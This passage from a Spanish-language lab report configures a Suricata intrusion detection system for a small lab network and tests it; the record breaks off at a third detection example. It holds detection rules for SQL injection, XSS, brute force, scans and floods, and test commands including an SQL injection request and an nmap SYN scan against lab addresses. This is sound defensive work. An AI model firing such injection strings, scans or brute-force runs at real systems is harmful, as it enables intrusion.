<span id="cb13-13"><a href="#cb13-13" aria-hidden="true" tabindex="-1"></a><span class="fu">find</span> <span class="va">$BACKUP_DIR</span> <span class="at">-name</span> <span class="st">&quot;*.gz&quot;</span> <span class="at">-mtime</span> +30 <span class="at">-delete</span></span></code></pre></div>
<h4 id="logging-y-auditoría">4.3.2 Logging y Auditoría</h4>
<p><strong>Configuración de logs:</strong></p>
<div class="sourceCode" id="cb14"><pre class="sourceCode bash"><code class="sourceCode bash"><span id="cb14-1"><a href="#cb14-1" aria-hidden="true" tabindex="-1"></a><span class="co"># Rotación de logs</span></span>
<span id="cb14-2"><a href="#cb14-2" aria-hidden="true" tabindex="-1"></a><span class="ex">/var/log/apache2/*.log</span> {</span>
<span id="cb14-3"><a href="#cb14-3" aria-hidden="true" tabindex="-1"></a>    <span class="ex">daily</span></span>
<span id="cb14-4"><a href="#cb14-4" aria-hidden="true" tabindex="-1"></a>    <span class="ex">rotate</span> 30</span>
<span id="cb14-5"><a href="#cb14-5" aria-hidden="true" tabindex="-1"></a>    <span class="ex">compress</span></span>
<span id="cb14-6"><a href="#cb14-6" aria-hidden="true" tabindex="-1"></a>    <span class="ex">delaycompress</span></span>
<span id="cb14-7"><a href="#cb14-7" aria-hidden="true" tabindex="-1"></a>    <span class="ex">create</span> 640 root adm</span>
<span id="cb14-8"><a href="#cb14-8" aria-hidden="true" tabindex="-1"></a><span class="er">}</span></span></code></pre></div>
<p><strong>Eventos críticos monitorizados:</strong> - Intentos de
autenticación fallidos (&gt;5 en 5 min) - Modificaciones en archivos
críticos - Patrones de escaneo de vulnerabilidades - Accesos a recursos
no autorizados</p>
<h4 id="procedimiento-de-recuperación">4.3.3 Procedimiento de
Recuperación</h4>
<p><strong>Fases en caso de compromiso:</strong></p>
<ol type="1">
<li><strong>Contención (0-15 min)</strong>
<ul>
<li>Aislar servidor de la red</li>
<li>Bloquear IPs atacantes</li>
<li>Capturar imagen forense</li>
</ul></li>
<li><strong>Erradicación (15-60 min)</strong>
<ul>
<li>Eliminar backdoors</li>
<li>Restaurar desde backup verificado</li>
<li>Cambiar todas las credenciales</li>
</ul></li>
<li><strong>Recuperación (1-4 horas)</strong>
<ul>
<li>Aplicar parches de seguridad</li>
<li>Restaurar servicios con hardening</li>
<li>Validar integridad</li>
</ul></li>
<li><strong>Post-incidente (24-48 horas)</strong>
<ul>
<li>Análisis de causa raíz</li>
<li>Documentación completa</li>
<li>Actualización de procedimientos</li>
</ul></li>
</ol>
<hr />
<h2 id="sistema-a-monitorizar-pre-suricata">5. SISTEMA A MONITORIZAR
(PRE-SURICATA)</h2>
<h3 id="topología-de-red">5.1 Topología de Red</h3>
<pre><code>Internet
   |
[Firewall]
   |
[Router] - 192.168.1.1
   |
   +--- [Servidor Web] 192.168.1.10:8083,8443
   +--- [Servidor BD] 192.168.1.11:3336
   +--- [Servidor SSH] 192.168.1.12:2288
   +--- [IDS Suricata] 192.168.1.20 (promiscuo)</code></pre>
<h3 id="servicios-protegidos">5.2 Servicios Protegidos</h3>
<table>
<thead>
<tr class="header">
<th>Servicio</th>
<th>IP</th>
<th>Puerto</th>
<th>Descripción</th>
</tr>
</thead>
<tbody>
<tr class="odd">
<td>HTTP</td>
<td>192.168.1.10</td>
<td>8083</td>
<td>Servidor web interno</td>
</tr>
<tr class="even">
<td>HTTPS</td>
<td>192.168.1.10</td>
<td>8443</td>
<td>Servidor web SSL</td>
</tr>
<tr class="odd">
<td>MySQL Admin</td>
<td>192.168.1.11</td>
<td>3336</td>
<td>Base de datos</td>
</tr>
<tr class="even">
<td>SSH/SFTP</td>
<td>192.168.1.12</td>
<td>2288</td>
<td>Acceso remoto</td>
</tr>
</tbody>
</table>
<h3 id="política-de-seguridad">5.3 Política de Seguridad</h3>
<p><strong>Red confiable (<span class="math inline"><em>H</em><em>O</em><em>M</em><em>E</em><sub><em>N</em></sub><em>E</em><em>T</em>) :  *  * 192.168.1.0/24 *  * <em>R</em><em>e</em><em>d</em><em>e</em><em>x</em><em>t</em><em>e</em><em>r</em><em>n</em><em>a</em>(</span>EXTERNAL_NET):</strong>
!$HOME_NET</p>
<p><strong>Regla de seguridad:</strong> Todo tráfico desde redes
externas hacia los servicios internos debe ser detectado y alertado como
potencialmente sospechoso.</p>
<hr />
<h2 id="configuración-ids-suricata">6. CONFIGURACIÓN IDS SURICATA</h2>
<h3 id="instalación">6.1 Instalación</h3>
<div class="sourceCode" id="cb16"><pre class="sourceCode bash"><code class="sourceCode bash"><span id="cb16-1"><a href="#cb16-1" aria-hidden="true" tabindex="-1"></a><span class="co"># Crear estructura</span></span>
<span id="cb16-2"><a href="#cb16-2" aria-hidden="true" tabindex="-1"></a><span class="fu">mkdir</span> <span class="at">-p</span> ~/suricata/<span class="dt">{rules</span><span class="op">,</span><span class="dt">config</span><span class="op">,</span><span class="dt">logs}</span></span>
<span id="cb16-3"><a href="#cb16-3" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb16-4"><a href="#cb16-4" aria-hidden="true" tabindex="-1"></a><span class="co"># Desplegar contenedor</span></span>
<span id="cb16-5"><a href="#cb16-5" aria-hidden="true" tabindex="-1"></a><span class="ex">docker</span> run <span class="at">--rm</span> <span class="at">-it</span> <span class="dt">\</span></span>
<span id="cb16-6"><a href="#cb16-6" aria-hidden="true" tabindex="-1"></a>  <span class="at">--net</span><span class="op">=</span>host <span class="dt">\</span></span>
<span id="cb16-7"><a href="#cb16-7" aria-hidden="true" tabindex="-1"></a>  <span class="at">--cap-add</span><span class="op">=</span>net_admin <span class="dt">\</span></span>
<span id="cb16-8"><a href="#cb16-8" aria-hidden="true" tabindex="-1"></a>  <span class="at">--cap-add</span><span class="op">=</span>sys_nice <span class="dt">\</span></span>
<span id="cb16-9"><a href="#cb16-9" aria-hidden="true" tabindex="-1"></a>  <span class="at">-v</span> <span class="va">$(</span><span class="bu">pwd</span><span class="va">)</span>/logs:/var/log/suricata <span class="dt">\</span></span>
<span id="cb16-10"><a href="#cb16-10" aria-hidden="true" tabindex="-1"></a>  <span class="at">-v</span> <span class="va">$(</span><span class="bu">pwd</span><span class="va">)</span>/rules:/var/lib/suricata/rules <span class="dt">\</span></span>
<span id="cb16-11"><a href="#cb16-11" aria-hidden="true" tabindex="-1"></a>  <span class="at">-v</span> <span class="va">$(</span><span class="bu">pwd</span><span class="va">)</span>/config:/etc/suricata <span class="dt">\</span></span>
<span id="cb16-12"><a href="#cb16-12" aria-hidden="true" tabindex="-1"></a>  jasonish/suricata:6.0.15 <span class="dt">\</span></span>
<span id="cb16-13"><a href="#cb16-13" aria-hidden="true" tabindex="-1"></a>  <span class="at">-i</span> eth0</span>
<span id="cb16-14"><a href="#cb16-14" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb16-15"><a href="#cb16-15" aria-hidden="true" tabindex="-1"></a><span class="co"># Descargar reglas base</span></span>
<span id="cb16-16"><a href="#cb16-16" aria-hidden="true" tabindex="-1"></a><span class="ex">docker</span> exec <span class="at">-it</span> <span class="at">--user</span> suricata <span class="op">&lt;</span>CONTAINER_ID<span class="op">&gt;</span> suricata-update <span class="at">-f</span></span></code></pre></div>
<h3 id="reglas-personalizadas">6.2 Reglas Personalizadas</h3>
<p><strong>Archivo:</strong>
<code>/var/lib/suricata/rules/custom-rules.rules</code></p>
<div class="sourceCode" id="cb17"><pre class="sourceCode bash"><code class="sourceCode bash"><span id="cb17-1"><a href="#cb17-1" aria-hidden="true" tabindex="-1"></a><span class="co"># Protección HTTP/HTTPS</span></span>
<span id="cb17-2"><a href="#cb17-2" aria-hidden="true" tabindex="-1"></a><span class="ex">alert</span> tcp <span class="va">$EXTERNAL_NET</span> any <span class="at">-</span><span class="op">&gt;</span> <span class="va">$HOME_NET</span> 8083 <span class="dt">\</span></span>
<span id="cb17-3"><a href="#cb17-3" aria-hidden="true" tabindex="-1"></a>  <span class="er">(</span><span class="ex">msg:</span><span class="st">&quot;ALERTA: Acceso HTTP no autorizado puerto 8083&quot;</span><span class="kw">;</span> <span class="dt">\</span></span>
<span id="cb17-4"><a href="#cb17-4" aria-hidden="true" tabindex="-1"></a>  <span class="ex">flow:to_server,established</span><span class="kw">;</span> <span class="dt">\</span></span>
<span id="cb17-5"><a href="#cb17-5" aria-hidden="true" tabindex="-1"></a>  <span class="ex">classtype:policy-violation</span><span class="kw">;</span> <span class="dt">\</span></span>
<span id="cb17-6"><a href="#cb17-6" aria-hidden="true" tabindex="-1"></a>  <span class="ex">sid:1000001</span><span class="kw">;</span> <span class="ex">rev:1</span><span class="kw">;)</span></span>
<span id="cb17-7"><a href="#cb17-7" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb17-8"><a href="#cb17-8" aria-hidden="true" tabindex="-1"></a><span class="ex">alert</span> tcp <span class="va">$EXTERNAL_NET</span> any <span class="at">-</span><span class="op">&gt;</span> <span class="va">$HOME_NET</span> 8443 <span class="dt">\</span></span>
<span id="cb17-9"><a href="#cb17-9" aria-hidden="true" tabindex="-1"></a>  <span class="er">(</span><span class="ex">msg:</span><span class="st">&quot;ALERTA: Acceso HTTPS no autorizado puerto 8443&quot;</span><span class="kw">;</span> <span class="dt">\</span></span>
<span id="cb17-10"><a href="#cb17-10" aria-hidden="true" tabindex="-1"></a>  <span class="ex">flow:to_server,established</span><span class="kw">;</span> <span class="dt">\</span></span>
<span id="cb17-11"><a href="#cb17-11" aria-hidden="true" tabindex="-1"></a>  <span class="ex">classtype:policy-violation</span><span class="kw">;</span> <span class="dt">\</span></span>
<span id="cb17-12"><a href="#cb17-12" aria-hidden="true" tabindex="-1"></a>  <span class="ex">sid:1000002</span><span class="kw">;</span> <span class="ex">rev:1</span><span class="kw">;)</span></span>
<span id="cb17-13"><a href="#cb17-13" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb17-14"><a href="#cb17-14" aria-hidden="true" tabindex="-1"></a><span class="co"># Detección de ataques web</span></span>
<span id="cb17-15"><a href="#cb17-15" aria-hidden="true" tabindex="-1"></a><span class="ex">alert</span> http <span class="va">$EXTERNAL_NET</span> any <span class="at">-</span><span class="op">&gt;</span> <span class="va">$HOME_NET</span> <span class="pp">[</span><span class="ss">8083,8443</span><span class="pp">]</span> <span class="dt">\</span></span>
<span id="cb17-16"><a href="#cb17-16" aria-hidden="true" tabindex="-1"></a>  <span class="er">(</span><span class="ex">msg:</span><span class="st">&quot;ATAQUE: Posible SQL Injection&quot;</span><span class="kw">;</span> <span class="dt">\</span></span>
<span id="cb17-17"><a href="#cb17-17" aria-hidden="true" tabindex="-1"></a>  <span class="ex">flow:to_server,established</span><span class="kw">;</span> <span class="dt">\</span></span>
<span id="cb17-18"><a href="#cb17-18" aria-hidden="true" tabindex="-1"></a>  <span class="ex">content:</span><span class="st">&quot;SELECT&quot;</span><span class="kw">;</span> <span class="ex">nocase</span><span class="kw">;</span> <span class="ex">http_uri</span><span class="kw">;</span> <span class="dt">\</span></span>
<span id="cb17-19"><a href="#cb17-19" aria-hidden="true" tabindex="-1"></a>  <span class="ex">content:</span><span class="st">&quot;FROM&quot;</span><span class="kw">;</span> <span class="ex">nocase</span><span class="kw">;</span> <span class="ex">distance:0</span><span class="kw">;</span> <span class="ex">http_uri</span><span class="kw">;</span> <span class="dt">\</span></span>
<span id="cb17-20"><a href="#cb17-20" aria-hidden="true" tabindex="-1"></a>  <span class="ex">classtype:web-application-attack</span><span class="kw">;</span> <span class="dt">\</span></span>
<span id="cb17-21"><a href="#cb17-21" aria-hidden="true" tabindex="-1"></a>  <span class="ex">sid:1000003</span><span class="kw">;</span> <span class="ex">rev:1</span><span class="kw">;)</span></span>
<span id="cb17-22"><a href="#cb17-22" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb17-23"><a href="#cb17-23" aria-hidden="true" tabindex="-1"></a><span class="ex">alert</span> http <span class="va">$EXTERNAL_NET</span> any <span class="at">-</span><span class="op">&gt;</span> <span class="va">$HOME_NET</span> <span class="pp">[</span><span class="ss">8083,8443</span><span class="pp">]</span> <span class="dt">\</span></span>
<span id="cb17-24"><a href="#cb17-24" aria-hidden="true" tabindex="-1"></a>  <span class="er">(</span><span class="ex">msg:</span><span class="st">&quot;ATAQUE: Intento de XSS&quot;</span><span class="kw">;</span> <span class="dt">\</span></span>
<span id="cb17-25"><a href="#cb17-25" aria-hidden="true" tabindex="-1"></a>  <span class="ex">flow:to_server,established</span><span class="kw">;</span> <span class="dt">\</span></span>
<span id="cb17-26"><a href="#cb17-26" aria-hidden="true" tabindex="-1"></a>  <span class="ex">content:</span><span class="st">&quot;&lt;script&quot;</span><span class="kw">;</span> <span class="ex">nocase</span><span class="kw">;</span> <span class="ex">http_uri</span><span class="kw">;</span> <span class="dt">\</span></span>
<span id="cb17-27"><a href="#cb17-27" aria-hidden="true" tabindex="-1"></a>  <span class="ex">classtype:web-application-attack</span><span class="kw">;</span> <span class="dt">\</span></span>
<span id="cb17-28"><a href="#cb17-28" aria-hidden="true" tabindex="-1"></a>  <span class="ex">sid:1000004</span><span class="kw">;</span> <span class="ex">rev:1</span><span class="kw">;)</span></span>
<span id="cb17-29"><a href="#cb17-29" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb17-30"><a href="#cb17-30" aria-hidden="true" tabindex="-1"></a><span class="co"># Protección MySQL</span></span>
<span id="cb17-31"><a href="#cb17-31" aria-hidden="true" tabindex="-1"></a><span class="ex">alert</span> tcp <span class="va">$EXTERNAL_NET</span> any <span class="at">-</span><span class="op">&gt;</span> <span class="va">$HOME_NET</span> 3336 <span class="dt">\</span></span>
<span id="cb17-32"><a href="#cb17-32" aria-hidden="true" tabindex="-1"></a>  <span class="er">(</span><span class="ex">msg:</span><span class="st">&quot;ALERTA CRITICA: Acceso MySQL desde red externa&quot;</span><span class="kw">;</span> <span class="dt">\</span></span>
<span id="cb17-33"><a href="#cb17-33" aria-hidden="true" tabindex="-1"></a>  <span class="ex">flow:to_server,established</span><span class="kw">;</span> <span class="dt">\</span></span>
<span id="cb17-34"><a href="#cb17-34" aria-hidden="true" tabindex="-1"></a>  <span class="ex">classtype:policy-violation</span><span class="kw">;</span> <span class="dt">\</span></span>
<span id="cb17-35"><a href="#cb17-35" aria-hidden="true" tabindex="-1"></a>  <span class="ex">sid:1000005</span><span class="kw">;</span> <span class="ex">rev:1</span><span class="kw">;)</span></span>
<span id="cb17-36"><a href="#cb17-36" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb17-37"><a href="#cb17-37" aria-hidden="true" tabindex="-1"></a><span class="ex">alert</span> tcp <span class="va">$EXTERNAL_NET</span> any <span class="at">-</span><span class="op">&gt;</span> <span class="va">$HOME_NET</span> 3336 <span class="dt">\</span></span>
<span id="cb17-38"><a href="#cb17-38" aria-hidden="true" tabindex="-1"></a>  <span class="er">(</span><span class="ex">msg:</span><span class="st">&quot;ATAQUE: Fuerza bruta MySQL&quot;</span><span class="kw">;</span> <span class="dt">\</span></span>
<span id="cb17-39"><a href="#cb17-39" aria-hidden="true" tabindex="-1"></a>  <span class="ex">flow:to_server,established</span><span class="kw">;</span> <span class="dt">\</span></span>
<span id="cb17-40"><a href="#cb17-40" aria-hidden="true" tabindex="-1"></a>  <span class="ex">threshold:type</span> threshold, track by_src, count 5, seconds 60<span class="kw">;</span> <span class="dt">\</span></span>
<span id="cb17-41"><a href="#cb17-41" aria-hidden="true" tabindex="-1"></a>  <span class="ex">classtype:attempted-admin</span><span class="kw">;</span> <span class="dt">\</span></span>
<span id="cb17-42"><a href="#cb17-42" aria-hidden="true" tabindex="-1"></a>  <span class="ex">sid:1000006</span><span class="kw">;</span> <span class="ex">rev:1</span><span class="kw">;)</span></span>
<span id="cb17-43"><a href="#cb17-43" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb17-44"><a href="#cb17-44" aria-hidden="true" tabindex="-1"></a><span class="co"># Protección SSH/SFTP</span></span>
<span id="cb17-45"><a href="#cb17-45" aria-hidden="true" tabindex="-1"></a><span class="ex">alert</span> tcp <span class="va">$EXTERNAL_NET</span> any <span class="at">-</span><span class="op">&gt;</span> <span class="va">$HOME_NET</span> 2288 <span class="dt">\</span></span>
<span id="cb17-46"><a href="#cb17-46" aria-hidden="true" tabindex="-1"></a>  <span class="er">(</span><span class="ex">msg:</span><span class="st">&quot;ALERTA: Acceso SSH no autorizado puerto 2288&quot;</span><span class="kw">;</span> <span class="dt">\</span></span>
<span id="cb17-47"><a href="#cb17-47" aria-hidden="true" tabindex="-1"></a>  <span class="ex">flow:to_server,established</span><span class="kw">;</span> <span class="dt">\</span></span>
<span id="cb17-48"><a href="#cb17-48" aria-hidden="true" tabindex="-1"></a>  <span class="ex">classtype:policy-violation</span><span class="kw">;</span> <span class="dt">\</span></span>
<span id="cb17-49"><a href="#cb17-49" aria-hidden="true" tabindex="-1"></a>  <span class="ex">sid:1000007</span><span class="kw">;</span> <span class="ex">rev:1</span><span class="kw">;)</span></span>
<span id="cb17-50"><a href="#cb17-50" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb17-51"><a href="#cb17-51" aria-hidden="true" tabindex="-1"></a><span class="ex">alert</span> tcp <span class="va">$EXTERNAL_NET</span> any <span class="at">-</span><span class="op">&gt;</span> <span class="va">$HOME_NET</span> 2288 <span class="dt">\</span></span>
<span id="cb17-52"><a href="#cb17-52" aria-hidden="true" tabindex="-1"></a>  <span class="er">(</span><span class="ex">msg:</span><span class="st">&quot;ATAQUE: Fuerza bruta SSH&quot;</span><span class="kw">;</span> <span class="dt">\</span></span>
<span id="cb17-53"><a href="#cb17-53" aria-hidden="true" tabindex="-1"></a>  <span class="ex">flow:to_server,established</span><span class="kw">;</span> <span class="dt">\</span></span>
<span id="cb17-54"><a href="#cb17-54" aria-hidden="true" tabindex="-1"></a>  <span class="ex">threshold:type</span> threshold, track by_src, count 5, seconds 120<span class="kw">;</span> <span class="dt">\</span></span>
<span id="cb17-55"><a href="#cb17-55" aria-hidden="true" tabindex="-1"></a>  <span class="ex">classtype:attempted-admin</span><span class="kw">;</span> <span class="dt">\</span></span>
<span id="cb17-56"><a href="#cb17-56" aria-hidden="true" tabindex="-1"></a>  <span class="ex">sid:1000008</span><span class="kw">;</span> <span class="ex">rev:1</span><span class="kw">;)</span></span>
<span id="cb17-57"><a href="#cb17-57" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb17-58"><a href="#cb17-58" aria-hidden="true" tabindex="-1"></a><span class="co"># Detección de escaneos</span></span>
<span id="cb17-59"><a href="#cb17-59" aria-hidden="true" tabindex="-1"></a><span class="ex">alert</span> tcp <span class="va">$EXTERNAL_NET</span> any <span class="at">-</span><span class="op">&gt;</span> <span class="va">$HOME_NET</span> <span class="pp">[</span><span class="ss">8083,8443,3336,2288</span><span class="pp">]</span> <span class="dt">\</span></span>
<span id="cb17-60"><a href="#cb17-60" aria-hidden="true" tabindex="-1"></a>  <span class="er">(</span><span class="ex">msg:</span><span class="st">&quot;RECONOCIMIENTO: Escaneo Nmap SYN&quot;</span><span class="kw">;</span> <span class="dt">\</span></span>
<span id="cb17-61"><a href="#cb17-61" aria-hidden="true" tabindex="-1"></a>  <span class="ex">flags:S</span><span class="kw">;</span> <span class="dt">\</span></span>
<span id="cb17-62"><a href="#cb17-62" aria-hidden="true" tabindex="-1"></a>  <span class="ex">threshold:type</span> threshold, track by_src, count 10, seconds 10<span class="kw">;</span> <span class="dt">\</span></span>
<span id="cb17-63"><a href="#cb17-63" aria-hidden="true" tabindex="-1"></a>  <span class="ex">classtype:attempted-recon</span><span class="kw">;</span> <span class="dt">\</span></span>
<span id="cb17-64"><a href="#cb17-64" aria-hidden="true" tabindex="-1"></a>  <span class="ex">sid:1000010</span><span class="kw">;</span> <span class="ex">rev:1</span><span class="kw">;)</span></span>
<span id="cb17-65"><a href="#cb17-65" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb17-66"><a href="#cb17-66" aria-hidden="true" tabindex="-1"></a><span class="ex">alert</span> icmp <span class="va">$EXTERNAL_NET</span> any <span class="at">-</span><span class="op">&gt;</span> <span class="va">$HOME_NET</span> any <span class="dt">\</span></span>
<span id="cb17-67"><a href="#cb17-67" aria-hidden="true" tabindex="-1"></a>  <span class="er">(</span><span class="ex">msg:</span><span class="st">&quot;ATAQUE: Posible ICMP Flood&quot;</span><span class="kw">;</span> <span class="dt">\</span></span>
<span id="cb17-68"><a href="#cb17-68" aria-hidden="true" tabindex="-1"></a>  <span class="ex">itype:8</span><span class="kw">;</span> <span class="ex">icode:0</span><span class="kw">;</span> <span class="dt">\</span></span>
<span id="cb17-69"><a href="#cb17-69" aria-hidden="true" tabindex="-1"></a>  <span class="ex">threshold:type</span> threshold, track by_src, count 50, seconds 10<span class="kw">;</span> <span class="dt">\</span></span>
<span id="cb17-70"><a href="#cb17-70" aria-hidden="true" tabindex="-1"></a>  <span class="ex">classtype:attempted-dos</span><span class="kw">;</span> <span class="dt">\</span></span>
<span id="cb17-71"><a href="#cb17-71" aria-hidden="true" tabindex="-1"></a>  <span class="ex">sid:1000011</span><span class="kw">;</span> <span class="ex">rev:1</span><span class="kw">;)</span></span></code></pre></div>
<h3 id="configuración-suricata.yaml">6.3 Configuración
suricata.yaml</h3>
<p><strong>Extracto relevante:</strong></p>
<div class="sourceCode" id="cb18"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb18-1"><a href="#cb18-1" aria-hidden="true" tabindex="-1"></a><span class="fu">vars</span><span class="kw">:</span></span>
<span id="cb18-2"><a href="#cb18-2" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">address-groups</span><span class="kw">:</span></span>
<span id="cb18-3"><a href="#cb18-3" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">HOME_NET</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;[192.168.1.0/24]&quot;</span></span>
<span id="cb18-4"><a href="#cb18-4" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">EXTERNAL_NET</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;!$HOME_NET&quot;</span></span>
<span id="cb18-5"><a href="#cb18-5" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">port-groups</span><span class="kw">:</span></span>
<span id="cb18-6"><a href="#cb18-6" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">HTTP_PORTS</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;[8083,8443]&quot;</span></span>
<span id="cb18-7"><a href="#cb18-7" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">MYSQL_PORTS</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;3336&quot;</span></span>
<span id="cb18-8"><a href="#cb18-8" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">SSH_PORTS</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;2288&quot;</span></span>
<span id="cb18-9"><a href="#cb18-9" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb18-10"><a href="#cb18-10" aria-hidden="true" tabindex="-1"></a><span class="fu">outputs</span><span class="kw">:</span></span>
<span id="cb18-11"><a href="#cb18-11" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="kw">-</span><span class="at"> </span><span class="fu">fast</span><span class="kw">:</span></span>
<span id="cb18-12"><a href="#cb18-12" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="fu">enabled</span><span class="kw">:</span><span class="at"> </span><span class="ch">yes</span></span>
<span id="cb18-13"><a href="#cb18-13" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="fu">filename</span><span class="kw">:</span><span class="at"> fast.log</span></span>
<span id="cb18-14"><a href="#cb18-14" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="kw">-</span><span class="at"> </span><span class="fu">eve-log</span><span class="kw">:</span></span>
<span id="cb18-15"><a href="#cb18-15" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="fu">enabled</span><span class="kw">:</span><span class="at"> </span><span class="ch">yes</span></span>
<span id="cb18-16"><a href="#cb18-16" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="fu">filename</span><span class="kw">:</span><span class="at"> eve.json</span></span>
<span id="cb18-17"><a href="#cb18-17" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="fu">types</span><span class="kw">:</span></span>
<span id="cb18-18"><a href="#cb18-18" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="kw">-</span><span class="at"> alert</span></span>
<span id="cb18-19"><a href="#cb18-19" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="kw">-</span><span class="at"> http</span></span>
<span id="cb18-20"><a href="#cb18-20" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb18-21"><a href="#cb18-21" aria-hidden="true" tabindex="-1"></a><span class="fu">rule-files</span><span class="kw">:</span></span>
<span id="cb18-22"><a href="#cb18-22" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="kw">-</span><span class="at"> custom-rules.rules</span></span>
<span id="cb18-23"><a href="#cb18-23" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="kw">-</span><span class="at"> suricata.rules</span></span></code></pre></div>
<h3 id="activación">6.4 Activación</h3>
<div class="sourceCode" id="cb19"><pre class="sourceCode bash"><code class="sourceCode bash"><span id="cb19-1"><a href="#cb19-1" aria-hidden="true" tabindex="-1"></a><span class="co"># Recargar reglas</span></span>
<span id="cb19-2"><a href="#cb19-2" aria-hidden="true" tabindex="-1"></a><span class="ex">docker</span> exec <span class="at">-it</span> <span class="op">&lt;</span>CONTAINER_ID<span class="op">&gt;</span> suricatasc <span class="at">-c</span> reload-rules</span>
<span id="cb19-3"><a href="#cb19-3" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb19-4"><a href="#cb19-4" aria-hidden="true" tabindex="-1"></a><span class="co"># Verificar</span></span>
<span id="cb19-5"><a href="#cb19-5" aria-hidden="true" tabindex="-1"></a><span class="ex">docker</span> exec <span class="at">-it</span> <span class="op">&lt;</span>CONTAINER_ID<span class="op">&gt;</span> suricatasc <span class="at">-c</span> ruleset-stats</span></code></pre></div>
<hr />
<h2 id="pruebas-y-resultados">7. PRUEBAS Y RESULTADOS</h2>
<h3 id="matriz-de-pruebas">7.1 Matriz de Pruebas</h3>
<table>
<thead>
<tr class="header">
<th>#</th>
<th>Prueba</th>
<th>Herramienta</th>
<th>SID</th>
<th>Resultado</th>
</tr>
</thead>
<tbody>
<tr class="odd">
<td>1</td>
<td>Acceso HTTP no autorizado</td>
<td>curl</td>
<td>1000001</td>
<td>✅ DETECTADO</td>
</tr>
<tr class="even">
<td>2</td>
<td>Acceso HTTPS no autorizado</td>
<td>curl</td>
<td>1000002</td>
<td>✅ DETECTADO</td>
</tr>
<tr class="odd">
<td>3</td>
<td>SQL Injection</td>
<td>curl</td>
<td>1000003</td>
<td>✅ DETECTADO</td>
</tr>
<tr class="even">
<td>4</td>
<td>XSS Attack</td>
<td>curl</td>
<td>1000004</td>
<td>✅ DETECTADO</td>
</tr>
<tr class="odd">
<td>5</td>
<td>Acceso MySQL externo</td>
<td>mysql</td>
<td>1000005</td>
<td>✅ DETECTADO</td>
</tr>
<tr class="even">
<td>6</td>
<td>Brute Force MySQL</td>
<td>hydra</td>
<td>1000006</td>
<td>✅ DETECTADO</td>
</tr>
<tr class="odd">
<td>7</td>
<td>Acceso SSH externo</td>
<td>ssh</td>
<td>1000007</td>
<td>✅ DETECTADO</td>
</tr>
<tr class="even">
<td>8</td>
<td>Brute Force SSH</td>
<td>hydra</td>
<td>1000008</td>
<td>✅ DETECTADO</td>
</tr>
<tr class="odd">
<td>9</td>
<td>Port Scanning</td>
<td>nmap</td>
<td>1000010</td>
<td>✅ DETECTADO</td>
</tr>
<tr class="even">
<td>10</td>
<td>ICMP Flood</td>
<td>hping3</td>
<td>1000011</td>
<td>✅ DETECTADO</td>
</tr>
</tbody>
</table>
<h3 id="ejemplos-de-detección">7.2 Ejemplos de Detección</h3>
<h4 id="prueba-1-acceso-http-no-autorizado">Prueba 1: Acceso HTTP no
autorizado</h4>
<p><strong>Comando:</strong></p>
<div class="sourceCode" id="cb20"><pre class="sourceCode bash"><code class="sourceCode bash"><span id="cb20-1"><a href="#cb20-1" aria-hidden="true" tabindex="-1"></a><span class="ex">curl</span> http://192.168.1.10:8083/</span></code></pre></div>
<p><strong>Alerta generada:</strong></p>
<pre><code>11/15/2025-14:23:45.123456 [**] [1:1000001:1] ALERTA: Acceso HTTP no autorizado puerto 8083 [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 203.0.113.25:55555 -&gt; 192.168.1.10:8083</code></pre>
<h4 id="prueba-3-sql-injection">Prueba 3: SQL Injection</h4>
<p><strong>Comando:</strong></p>
<div class="sourceCode" id="cb22"><pre class="sourceCode bash"><code class="sourceCode bash"><span id="cb22-1"><a href="#cb22-1" aria-hidden="true" tabindex="-1"></a><span class="ex">curl</span> <span class="st">&quot;http://192.168.1.10:8083/login.php?id=1%20OR%201=1;SELECT%20*%20FROM%20users&quot;</span></span></code></pre></div>
<p><strong>Alerta:</strong></p>
<pre><code>11/15/2025-14:25:12.789012 [**] [1:1000003:1] ATAQUE: Posible SQL Injection [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 203.0.113.25:56789 -&gt; 192.168.1.10:8083</code></pre>
<h4 id="prueba-9-port-scanning">Prueba 9: Port Scanning</h4>
<p><strong>Comando:</strong></p>
<div class="sourceCode" id="cb24"><pre class="sourceCode bash"><code class="sourceCode bash"><span id="cb24-1"><a href="#cb24-1" aria-hidden="true" tabindex="-1"></a><span class="fu">nmap</span> <span class="at">-sS</span> <span class="at">-p</span> 8083,8443,3336,2288 192.168.1.10-12</span></code></pre></div>
<p><strong>Alerta:</strong></p>
